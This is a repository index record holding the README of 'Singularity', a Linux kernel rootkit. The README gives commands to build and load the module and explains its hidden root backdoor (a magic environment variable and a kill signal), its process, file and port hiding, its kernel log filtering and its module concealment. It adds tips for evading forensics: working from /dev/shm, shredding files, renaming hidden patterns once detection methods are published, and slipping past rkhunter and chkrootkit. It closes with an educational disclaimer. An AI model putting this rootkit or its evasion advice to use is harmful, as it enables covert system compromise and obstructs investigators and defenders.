{"id":31703685,"url":"https://github.com/matheuzsecurity/singularity","last_synced_at":"2025-10-08T22:25:21.376Z","repository":{"id":316267896,"uuid":"1062196393","full_name":"MatheuZSecurity/Singularity","owner":"MatheuZSecurity","description":"LKM rootkit for modern kernels (6x)","archived":false,"fork":false,"pushed_at":"2025-09-30T21:08:38.000Z","size":60,"stargazers_count":205,"open_issues_count":0,"forks_count":27,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-09-30T23:18:38.920Z","etag":null,"topics":["ftrace","hooking","kernel","linux","lkm","poc","rootkit","syscall"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/MatheuZSecurity.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-09-23T00:07:21.000Z","updated_at":"2025-09-30T22:56:16.000Z","dependencies_parsed_at":"2025-09-23T17:33:43.945Z","dependency_job_id":"51f39fc8-54a3-4d8a-9ef2-3d02405fc949","html_url":"https://github.com/MatheuZSecurity/Singularity","commit_stats":null,"previous_names":["matheuzsecurity/singularity"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/MatheuZSecurity/Singularity","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MatheuZSecurity%2FSingularity","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MatheuZSecurity%2FSingularity/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/re
positories/MatheuZSecurity%2FSingularity/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MatheuZSecurity%2FSingularity/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/MatheuZSecurity","download_url":"https://codeload.github.com/MatheuZSecurity/Singularity/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MatheuZSecurity%2FSingularity/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":279000780,"owners_count":26082851,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-08T02:00:06.501Z","response_time":56,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ftrace","hooking","kernel","linux","lkm","poc","rootkit","syscall"],"created_at":"2025-10-08T22:25:20.126Z","updated_at":"2025-10-08T22:25:21.371Z","avatar_url":"https://github.com/MatheuZSecurity.png","language":"C","readme":"# Singularity - A powerful Linux Kernel Rootkit\n\n\u003cimg src=\"https://i.imgur.com/MMYuntK.png\" alt=\"imgur\" width=\"600\"/\u003e\n\n\n\u003e *\"Shall we give forensics a little work?\"*  \n\n\n**Singularity** is a Linux Kernel Module (LKM) rootkit for modern kernels (6x).\n\n---\n\n## Install\n\nNOTE: There is no feature to make the module visible again, so once it is loaded, it will be hidden automatically and there is no way to remove it other than 
restarting the machine (if you have not enabled persistence after reboot).\n\n\n```\ncd /dev/shm\ngit clone https://github.com/MatheuZSecurity/Singularity\ncd Singularity\nmake\nsudo insmod singularity.ko\nsudo bash scripts/journal.sh\nsudo bash scripts/x.sh\ncd ..\n```\n\n## Usage features\n\n### Hiding process\n\nTo hide any process you can use `kill -59 PID`, and it will hide from `/proc/`, `ps`, `top`, and any process viewer; it will also be hidden from commands like `stat` and `ls`.\n\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"https://i.imgur.com/wX2g459.png\"\u003e\n\u003c/p align=\"center\"\u003e\n\n### Hiding directory / files\n\nTo hide any directory or file, you can edit or view the file at `include/hiding_directory_def.h` and create a directory or file with its name, for example using `singularity`.\n\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"https://i.imgur.com/a8eb6KS.png\"\u003e\n\u003c/p align=\"center\"\u003e\n\n### Become root\n\nTo become root, you can use the magic word, `MAGIC=mtz bash`, to spawn a bash with root.\n\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"https://i.imgur.com/jCoi0LV.png\"\u003e\n\u003c/p align=\"center\"\u003e\n\nAnd you can use `kill -59 PID` too to become root.\n\n### Hiding port\n\nYou can open a listening port 8081 and that port will be hidden from `ss`, `netstat`, `lsof` and `/proc/net/*` as well.\n\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"https://i.imgur.com/WUuLu1q.png\"\u003e\n\u003c/p align=\"center\"\u003e\n\n\u003e **Tested kernels: (**6.8.0-79-generic** and **6.12** only), other kernel versions may not compile or crash, precisely because it was designed for modern 6x kernels. This is a risk you can take, so use it in a VM. 
You can also modify the code to work on any kernel version you like.**  \n\n## All credits\n\n**Singularity** was created by me (**MatheuZSecurity**) with the goal of challenging myself to create an LKM Rootkit that is as undetectable as possible\n\n- https://www.linkedin.com/in/mathsalves/\n\nJoin in **Rootkit Researchers** a community where there are only wizards and people who like rootkits, malware, red teaming, forensics and cyber security in general.\n\n- https://discord.gg/66N5ZQppU7\n\nThere are codes that I originally reused from my \"Collection of codes focused on Linux rootkits\" repository, so \n**credits to the repo contributors as well.**\n\n- https://github.com/MatheuZSecurity/Rootkit\n\n---\n\n\n## What Singularity *is*\n\nSingularity, at a high level:\n\n- Environment-triggered **privilege elevation** (signals/env markers).\n- **Process hiding**: syscall-level filtering of `/proc` and process APIs.\n- **Filesystem hiding**: directory listing and stat filtering by pattern.\n- **Network stealth**: procfs-based `/proc/net/*` filtering and selective packet suppression.\n- **Kernel log sanitization**: read-side filtering for `dmesg`/journal interfaces.\n- **Module-hiding utilities**: sysfs \u0026 module-list tampering for reduced visibility.\n- A background routine that **normalizes taint indicators** .\n\n\n## More evasion tips\n\n#### Debugfs\n\nAll current LKM rootkits, even open source ones, can be detected via `debugfs` on `/dev/sda3` (example) and this is certainly a problem for us.\n\n1) To prevent any operations performed from being easily detected by forensic tools such as `debugfs`, it is recommended to create hidden files and directories in `/dev/shm`.\n\nThis directory is a partition mounted in RAM `(tmpfs)`, meaning it does not use the disk file system. 
For this reason, debugfs, which works directly with file systems such as ext4, cannot inspect the contents of `/dev/shm`.\n\n2) Additionally, to ensure that files are actually destroyed on disk (if not in tmpfs), use the `shred` command.\n\nShred overwrites the data before deleting the file, minimizing the chance of recovery, including of inodes that may contain important metadata.\n\n3) If you want to enable persistence after reboot with `load_and_persistence.sh`, **know that the kernel module will also be visible in debugfs and can be found**, so it's up to each person whether they want to use it, if you don't want to use it, just simply use the `make` command and load the module with `sudo insmod singularity.ko`\n\n#### Standard tools\n\nSingularity is able to easily bypass standard tools like **unhide, chkrootkit and rkhunter.**\n\n#### Hidden file/directory\n\n1) You can simply change the name of the hidden pattern in `include/hiding_directory_def.h`, because if posts appear teaching how to detect it by this, you can change the name to whatever you want.\n\n2) You can also enable persistence after reboot, the name will be `singularity.conf`, but it is recommended that you change the name of the LKM/conf file, because if not a simple cat on the conf file in /etc/modules-load.d/ can reveal it to you\n\n3) By default, with the directory name hidden, you cannot access it via `cd` command, it is useful when you need to copy some important file into the directory and then `cat singularity/shadow`, or simply copy a binary or something you want into the directory, and from there you use it without necessarily entering the directory\n\n4) You can edit the filter in `modules/clear_taint_dmesg.c` as much as you want, you can add any log files you want or any file whose name you don't want to be visible (Be very careful with this, because depending on the word being filtered, it can break the system.)\n\n\n---\n\n## Hook map\n\nThis map shows the main hooks.\n\n```\n\n    
                        Rootkit Researchers\n                         +-----------------------+\n                         |   Userland Programs   |\n                         | (shells, tools, apps) |\n                         +-----------------------+\n                                    |\n                       Hooked syscalls \u0026 interfaces\n                                    |\n            +--------------------------------------------------+\n            |                  ftrace hook core               |\n            |   (centralized hook installer / fh_install)     |\n            +--------------------------------------------------+\n            /     |         |         |         |        |     \\\n           /      |         |         |         |        |      \\\n  +---------+ +-------+ +--------+ +--------+ +------+ +--------+ +------------+\n  | getdents | | stat/ | | open/  | | read/  | | tcp/ | | write/ | | module     |\n  | hooks    | | statx | | read-  | | read   | |proc/ | | hooks  | | hooks      |\n  | (hiding  | | hooks | | link   | | hooks  | |hooks | |(ftrace| |(insmod /   |\n  | _directory,| (_stat)| (_readlink)| (clear_) |(hiding)| control)| | hide_module)|\n  | _getdents)| |      | | hooks  | | taint) | |      | |        | |            |\n  +----+----+ +---+---+ +---+----+ +---+----+ +---+--+ +---+----+ +------+-----+\n       |          |         |          |        |        |             |\n       |          |         |          |        |        |             |\n       |          |         |          |        |        |             |\n  files/dirs   file meta   symlinks   kernel   /proc/net  debug/trace    module list\n  (ls, find)   (stat/statx) (readlink) logs \u0026  networking  interfaces    \u0026 sysfs\n                                              dmesg/journal\n                                            (taint masking, filtering)\n```\n\n---\n\n## Hook reference\n\n| Functions / Syscall | Module (file) | Short purpose 
|\n|---|---:|---|\n| `getdents` / `getdents64` | `modules/hiding_directory.c` | Filter directory entries by pattern \u0026 hide PIDs. |\n| `stat` / `statx` | `modules/hiding_stat.c` | Alter file metadata returned to userland; adjust `nlink`. |\n| `openat` / `readlinkat` | `modules/open.c`, `modules/hiding_readlink.c` | Return `ENOENT` for hidden paths / proc pids. |\n| `chdir` | `modules/hiding_chdir.c` | Block navigation into hidden paths. |\n| `read` (64/compat) | `modules/clear_taint_dmesg.c` | Filter kernel log reads (kmsg, journal) and remove tagged lines. |\n| `/proc/net` seqfile exports | `modules/hiding_tcp.c` | Filter TCP/UDP entries to hide a configured port; drop packets selectively. |\n| `write` syscalls | `modules/hooks_write.c` | Suppress writes to tracing controls like `ftrace_enabled`, `tracing_on`. |\n| `init_module` / `finit_module` | `modules/hooking_insmod.c` | Block native module insert attempts / syscall paths for insmod (optional). |\n| Module list / sysfs manipulation | `modules/hide_module.c` | Remove kobject entries and unlink module from list. |\n| Kernel taint mask (kprobe) | `modules/reset_tainted.c` | Locate tainted_mask and periodically normalize it . |\n| Credential manipulation | `modules/become_root.c` | Privilege escalation triggers. |\n| Hook installer | `ftrace/ftrace_helper.c` | Abstraction used to install ftrace-based hooks across modules. |\n\n\n---\n\n## Plot\n\nUnfortunately for some...\n\nEven with all these filters, protections, and hooks, there are still ways to detect this rootkit. \n\nBut if you're a good forensic, DFIR, or malware analyst, I'll let you figure it out on your own. \n\nI won't patch for this, because it will be much more OP ;)\n\n---\n## Contribution and Bugs\n\nFeel free to make pull requests and contribute to the project. 
Any errors with Singularity, please create an issue and report it to us.\n\nAny bug found, if you want, open an issue or contact me via discord: `kprobe`\n\n---\n\n## Disclaimer\n\nThis code was developed solely for educational purposes, research, and controlled demonstrations of evasion techniques. Any use outside authorized environments, or for malicious purposes, is strictly prohibited and entirely the responsibility of the user. Unauthorized or illegal use may violate local, national, or international laws.\n\n\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmatheuzsecurity%2Fsingularity","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmatheuzsecurity%2Fsingularity","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmatheuzsecurity%2Fsingularity/lists"}